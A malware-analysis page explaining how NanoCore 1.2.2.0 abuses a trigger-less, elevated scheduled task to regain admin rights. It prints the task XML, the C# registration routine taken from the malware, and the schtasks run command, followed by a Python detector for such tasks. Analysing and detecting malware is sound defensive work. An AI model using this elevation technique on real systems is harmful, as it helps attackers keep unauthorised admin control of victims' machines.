This repository contains the analysis reports, technical details and tools created to help with malware analysis. Additionally, the repo contains TTPs extracted from malware samples, with code and the corresponding detection rules.
This is a privilege escalation TTP extracted from NanoCore 1.2.2.0. It uses the Windows Task Scheduler to escalate privileges. Initially the NanoCore client is executed with admin privileges, and it creates a task in the scheduler with an admin (highest available privilege) configuration. Once the task has been added, the NanoCore client can easily regain admin privileges, even after a reboot, simply by issuing a run-task command.
The NanoCore 1.2.2.0 privilege escalation function carries the task's XML configuration as encoded bytes that set up everything for the task. The malware decodes the configuration, replaces the placeholder identifier EXECUTABLEPATH (#EXECUTABLEPATH in the XML) with the path of its executable and any arguments, and uses the resulting XML to register the task.
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"#EXECUTABLEPATH"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>
According to the task configuration, no triggers are set, so the task never executes automatically. As mentioned above, NanoCore doesn't use it to achieve persistence; rather, it uses it to elevate privileges. Doing that takes only a simple command: run the task that was registered.
// The using directives and method signature below are added so the extracted
// fragment compiles as a unit; SetProcessInfo is a helper defined elsewhere in
// the repository's code. Parameters: task = task name, text = decoded task
// XML, duration = milliseconds to wait for schtasks.exe to exit.
using System;
using System.Diagnostics;
using System.IO;

static bool CreateScheduledTask(string task, string text, int duration)
{
    try
    {
        // write the decoded task configuration XML to a temporary file
        string tempFileName = Path.GetTempFileName();
        File.WriteAllText(tempFileName, text);
        // register the task from that XML; /f overwrites an existing task of the same name
        string task_cmd = string.Format("/create /f /tn \"{0}\" /xml \"{1}\"", task, tempFileName);
        ProcessStartInfo startInfo = SetProcessInfo("schtasks.exe", task_cmd);
        Process process = Process.Start(startInfo);
        bool result = false;
        // exit code 0 from schtasks.exe means the task was registered
        if (process.WaitForExit(duration))
        {
            result = (process.ExitCode == 0);
        }
        File.Delete(tempFileName); // delete the temporary task configuration file
        return result;
    }
    catch (Exception exception_)
    {
        Console.WriteLine(exception_ + ":CreateScheduledTask");
        return false; // the original fragment had no return on this path
    }
}
After the task has been successfully registered, it can be run like this:
schtasks.exe /run /tn "NTFS Manager"
Here "NTFS Manager" is, for example, the name under which the task was registered.
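From the defender's side, the registered task definition itself is the durable artifact: an elevated (RunLevel HighestAvailable), trigger-less, on-demand task whose command lives in a user-writable directory is the shape this TTP leaves behind. The following added example (not code from the repository) parses Task Scheduler XML in that format and flags those traits; the sample task and its executable path are constructed, not real indicators.

```python
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler XML definitions (as in the page's config).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories a standard user can write to; an elevated task launched from
# one of these is the smell this page's TTP leaves behind.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def task_risk_flags(task_xml):
    """Findings for one Task Scheduler XML definition (bytes or str)."""
    root = ET.fromstring(task_xml)
    flags = []
    if root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS) == "HighestAvailable":
        flags.append("RunLevel=HighestAvailable (task runs elevated)")
    triggers = root.find("t:Triggers", NS)
    if triggers is None or len(triggers) == 0:
        flags.append("no triggers: task only starts via 'schtasks /run' or the API")
    command = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS).strip().strip('"')
    if any(seg in command.lower() for seg in USER_WRITABLE):
        flags.append("Command in user-writable path: " + command)
    if "$(Arg" in root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS):
        flags.append("Arguments chosen by whoever starts the task ($(ArgN))")
    return flags


def is_nanocore_like(task_xml):
    """True when a definition matches this page's pattern: elevated,
    on-demand only, and launched from a user-writable directory."""
    found = task_risk_flags(task_xml)
    return all(any(f.startswith(p) for f in found)
               for p in ("RunLevel=", "no triggers", "Command in"))


# Constructed sample: the page's task definition with #EXECUTABLEPATH filled
# with a hypothetical profile path (not a real indicator). Exported task
# files are UTF-16 with a BOM, so the sample is encoded the same way.
SUSPICIOUS_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo /><Triggers />
  <Principals><Principal id="Author"><LogonType>InteractiveToken</LogonType>
    <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><AllowStartOnDemand>true</AllowStartOnDemand></Settings>
  <Actions Context="Author"><Exec>
    <Command>"C:\\Users\\victim\\AppData\\Roaming\\NTFS Manager\\client.exe"</Command>
    <Arguments>$(Arg0)</Arguments>
  </Exec></Actions>
</Task>""".encode("utf-16")
```

On a live host the same function can be fed the files under C:\Windows\System32\Tasks, or the XML carried in Security event 4698 (task created), to surface tasks with this shape.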
The complete code can be found here: Shaddy43/MalwareAnalaysisSeries
The artifacts and code in this repository are intended for educational purposes only!